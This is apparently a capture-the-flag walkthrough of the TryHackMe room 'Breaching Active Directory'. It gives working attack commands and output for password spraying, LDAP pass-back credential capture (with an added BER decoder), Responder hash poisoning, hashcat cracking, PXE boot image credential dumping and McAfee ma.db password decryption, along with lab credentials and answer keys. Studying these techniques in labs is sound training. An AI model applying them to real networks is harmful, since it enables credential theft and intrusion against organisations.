【TryHackMe】Breaching Active Directory:Walkthrough

Overview

This is a walkthrough of the TryHackMe room "Breaching Active Directory".

Task2

Q1.What popular website can be used to verify if your email address or password has ever been exposed in a publicly disclosed data breach?

A.HaveIBeenPwned

Task3

Q1.What is the name of the challenge-response authentication mechanism that uses NTLM?

A.NetNtlm

Q2.What is the username of the third valid credential pair found by the password spraying script?

Hint.If you are not using the AttackBox, make sure to install the Python libraries required to run the script, including both requests and requests_ntlm libraries.

Run a password spray with the provided Python script to find valid usernames. A spray tries one password across the whole user list, so each account sees only a single failed attempt and stays below the lockout threshold.

$ python ntlm_passwordspray.py -u usernames.txt -f za.tryhackme.com -p Changeme123 -a http://ntlmauth.za.tryhackme.com
[*] Starting passwords spray attack using the following password: Changeme123
[-] Failed login with Username: anthony.reynolds
[-] Failed login with Username: samantha.thompson
[-] Failed login with Username: dawn.turner
[-] Failed login with Username: frances.chapman
[-] Failed login with Username: henry.taylor
[-] Failed login with Username: jennifer.wood
[+] Valid credential pair found! Username: hollie.powell Password: Changeme123
[-] Failed login with Username: louise.talbot
[+] Valid credential pair found! Username: heather.smith Password: Changeme123
[-] Failed login with Username: dominic.elliott
[+] Valid credential pair found! Username: gordon.stevens Password: Changeme123
[-] Failed login with Username: alan.jones
[-] Failed login with Username: frank.fletcher
[-] Failed login with Username: maria.sheppard
[-] Failed login with Username: sophie.blackburn
[-] Failed login with Username: dawn.hughes
[-] Failed login with Username: henry.black
[-] Failed login with Username: joanne.davies
[-] Failed login with Username: mark.oconnor
[+] Valid credential pair found! Username: georgina.edwards Password: Changeme123
[*] Password spray attack completed, 4 valid credential pairs found

A.gordon.stevens

Q3.How many valid credentials pairs were found by the password spraying script?

A.4

Q4.What is the message displayed by the web application when authenticating with a valid credential pair?

Hint.Either modify the password spraying script to print out the "response.text" when the credentials are valid or use a Chrome browser window to authenticate manually using one of the valid credential pairs.

Logging in to the web application with one of the discovered credential pairs succeeds.

(screenshot: web application after authenticating with a valid credential pair)

A.Hello World

Task4

Q1.What type of attack can be performed against LDAP Authentication systems not commonly found against Windows Authentication systems?

Hint.This is a common attack to run against printers, forcing the printers to return AD credentials.

A.LDAP Pass-back Attack

Q2.What two authentication mechanisms do we allow on our rogue LDAP server to downgrade the authentication and make it clear text?

Hint.Use ldapsearch to list the supported authentication mechanisms on the rogue LDAP server. Answer format is , in alphabetical order.

Run ldapsearch against the rogue LDAP server we built to check which mechanisms it advertises.

$ ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
dn:
supportedSASLMechanisms: LOGIN
supportedSASLMechanisms: PLAIN

A.LOGIN,PLAIN

Q3.What is the password associated with the svcLDAP account?

(screenshot: printer LDAP settings pointed at the rogue LDAP server)

Click Test Settings a few times while capturing LDAP traffic on the VPN interface.

$ sudo tcpdump -SX -i breachad tcp port 389

(output truncated)

09:56:10.776020 IP 10.200.4.201.49917 > 10.50.2.30.ldap: Flags [P.], seq 2298699562:2298699627, ack 4084903087, win 1025, length 65
        0x0000:  4500 0069 996e 4000 7f06 4640 0ac8 04c9  E..i.n@...F@....
        0x0010:  0a32 021e c2fd 0185 8903 5f2a f37a acaf  .2........_*.z..
        0x0020:  5018 0401 6232 0000 3084 0000 003b 0201  P...b2..0....;..
        0x0030:  1660 8400 0000 3202 0102 0418 7a61 2e74  .`....2.....za.t
        0x0040:  7279 6861 636b 6d65 2e63 6f6d 5c73 7663  ryhackme.com\svc
        0x0050:  4c44 4150 8013 7472 7968 6163 6b6d 656c  LDAP..tryhackmel
        0x0060:  6461 7070 6173 7331 40                   dappass1@

A.tryhackmeldappass1@
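The capture above works because the printer falls back to a simple bind, which puts the password on the wire as a plain BER octet string. The following is an added example, not code from the TryHackMe room or the article: a minimal BER decoder that pulls the bind DN and cleartext password out of the exact TCP payload tcpdump printed (frame offset 0x28 onward, after the 20-byte IP and 20-byte TCP headers). The Windows LDAP client encodes lengths in long form (0x84 followed by four bytes), so the decoder handles both short and long forms.

```python
"""Decode the LDAP BindRequest from the tcpdump capture above.

Added example, not code from the TryHackMe room or the article.  LDAP messages
are ASN.1 BER; a simple bind carries the password as a plain OCTET STRING
(context tag 0x80), which is why a pass-back to a server that only offers
PLAIN/LOGIN yields cleartext credentials.
"""

# TCP payload of the packet in the tcpdump output above (frame offset 0x28 onward).
CAPTURED_BIND = bytes.fromhex(
    "3084 0000 003b 0201 1660 8400 0000 3202 0102 0418 7a61 2e74"
    "7279 6861 636b 6d65 2e63 6f6d 5c73 7663 4c44 4150 8013 7472"
    "7968 6163 6b6d 656c 6461 7070 6173 7331 40"
)

LDAP_MESSAGE, INTEGER = 0x30, 0x02
BIND_REQUEST = 0x60                    # [APPLICATION 0] constructed
AUTH_SIMPLE, AUTH_SASL = 0x80, 0xA3    # [0] simple, [3] sasl


def read_tlv(buf: bytes, pos: int):
    """Return (tag, value, next_pos) for the BER element starting at buf[pos]."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                  # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(payload: bytes) -> dict:
    """Extract message ID, protocol version, bind name and credentials."""
    tag, message, _ = read_tlv(payload, 0)
    if tag != LDAP_MESSAGE:
        raise ValueError(f"expected LDAPMessage SEQUENCE, got tag 0x{tag:02x}")
    tag, msg_id, pos = read_tlv(message, 0)
    if tag != INTEGER:
        raise ValueError("missing messageID")
    tag, bind, _ = read_tlv(message, pos)
    if tag != BIND_REQUEST:
        raise ValueError(f"not a BindRequest (protocolOp tag 0x{tag:02x})")
    _, version, pos = read_tlv(bind, 0)
    _, name, pos = read_tlv(bind, pos)
    auth_tag, cred, _ = read_tlv(bind, pos)
    result = {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode("utf-8"),
    }
    if auth_tag == AUTH_SIMPLE:
        result["auth"] = "simple"
        result["password"] = cred.decode("utf-8")   # cleartext on the wire
    elif auth_tag == AUTH_SASL:
        _, mechanism, _ = read_tlv(cred, 0)          # SaslCredentials.mechanism
        result["auth"] = "sasl"
        result["mechanism"] = mechanism.decode("utf-8")
    else:
        result["auth"] = f"unknown(0x{auth_tag:02x})"
    return result


if __name__ == "__main__":
    print(parse_bind_request(CAPTURED_BIND))
```

The third element of the BindRequest is the tell: tag 0x80 means a simple bind and the value is the password itself, while a client that negotiates SASL (for example GSSAPI against a real domain controller) sends tag 0xA3 with only the mechanism name, and no password ever appears in the capture.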

Task5

Q1.What is the name of the tool we can use to poison and capture authentication requests on the network?

A.Responder

Q2.What is the username associated with the challenge that was captured?

Run Responder on the VPN interface.

$ sudo responder -I breachad

After waiting a while, an NTLMv2 challenge-response is captured.

[SMB] NTLMv2-SSP Client   : 10.200.4.202
[SMB] NTLMv2-SSP Username : ZA\svcFileCopy
[SMB] NTLMv2-SSP Hash     : svcFileCopy::ZA:0a5448743b8d89d...

A.svcFileCopy

Q3.What is the value of the cracked password associated with the challenge that was captured?

Crack the captured hash with hashcat (mode 5600, NetNTLMv2) to recover the password.

$ hashcat -m 5600 ntlmhash passwordlist-1647876320267.txt

SVCFILECOPY::ZA:0a5448743b8d89d6:250b69cdcc8906515dcf924edcb59be3:...:FPassword1!

A.FPassword1!

Task6

Q1.What Microsoft tool is used to create and host PXE Boot images in organisations?

A.Microsoft Deployment Toolkit

Q2.What network protocol is used for recovery of files from the MDT server?

A.TFTP

Q3.What is the username associated with the account that was stored in the PXE Boot image?

Browse to http://pxeboot.za.tryhackme.com/ and note the name of the x64{...} BCD file.

(screenshot: PXE boot web listing showing the BCD file name)

SSH into the jump host.

$ ssh thm@THMJMP1.za.tryhackme.com

Create a working folder and copy powerpxe into it.

thm@THMJMP1 C:\Users\thm>cd Documents
thm@THMJMP1 C:\Users\thm\Documents>mkdir hello
thm@THMJMP1 C:\Users\thm\Documents>copy C:\powerpxe hello\
C:\powerpxe\LICENSE
C:\powerpxe\PowerPXE.ps1
C:\powerpxe\README.md
        3 file(s) copied.
thm@THMJMP1 C:\Users\thm\Documents>cd hello

Download the BCD file identified above over TFTP.

thm@THMJMP1 C:\Users\thm\Documents\hello>tftp -i 10.200.4.202 GET "\Tmp\x64{E792F07E-C0FB-4D15-816C-1D04070AD19D}.bcd" conf.bcd

Start PowerShell with the execution policy bypassed so the unsigned module can be loaded.

thm@THMJMP1 C:\Users\thm\Documents\hello>powershell -executionpolicy bypass

Import the copied PowerPXE module.

PS C:\Users\thm\Documents\hello> Import-Module .\PowerPXE.ps1

Set the $BCDFile variable and run Get-WimFile -bcdFile to parse the BCD file.

PS C:\Users\thm\Documents\hello> $BCDFile = "conf.bcd"
PS C:\Users\thm\Documents\hello> Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
\Boot\x64\Images\LiteTouchPE_x64.wim

Download the WIM file reported from the BCD file over TFTP.

PS C:\Users\thm\Documents\hello> tftp -i 10.200.4.202 GET "\Boot\x64\Images\LiteTouchPE_x64.wim" pxeboot.wim
Transfer successful: 341899611 bytes in 325 second(s), 1051998 bytes/s

Dump the credentials stored in the WIM file (PowerPXE reads them out of Bootstrap.ini).

PS C:\Users\thm\Documents\hello> Get-FindCredentials -WimFile pxeboot.wim
>> Open pxeboot.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\THMMDT\MTDBuildLab$
>>>> >>>> UserID = svcMDT
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = PXEBootSecure1@

A.svcMDT

Q4.What is the password associated with the account that was stored in the PXE Boot image?

A.PXEBootSecure1@

Task7

Q1.What type of files often contain stored credentials on hosts?

A.Configuration Files

Q2.What is the name of the McAfee database that stores configuration including credentials used to connect to the orchestrator?

Download ma.db from the jump host.

$ scp thm@THMJMP1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .
thm@thmjmp1.za.tryhackme.com's password: 
ma.db                                                                   100%  118KB  59.0KB/s   00:02

A.ma.db

Q3.What table in this database stores the credentials of the orchestrator?

Open ma.db in sqlitebrowser and look at the AGENT_REPOSITORIES table.

(screenshot: AGENT_REPOSITORIES table in sqlitebrowser)

A.AGENT_REPOSITORIES

Q4.What is the username of the AD account associated with the McAfee service?

The service account is listed in the AGENT_REPOSITORIES table.

(screenshot: AGENT_REPOSITORIES row showing the account name)

A.svcAV

Q5.What is the password of the AD account associated with the McAfee service?

Download the password decryption tool.

The encrypted password is in the AUTH_PASSWD column; decrypt it with the tool.

$ python mcafee_sitelist_pwd_decrypt.py jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
Crypted password   : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
Decrypted password : MyStrongPassword!

A.MyStrongPassword!
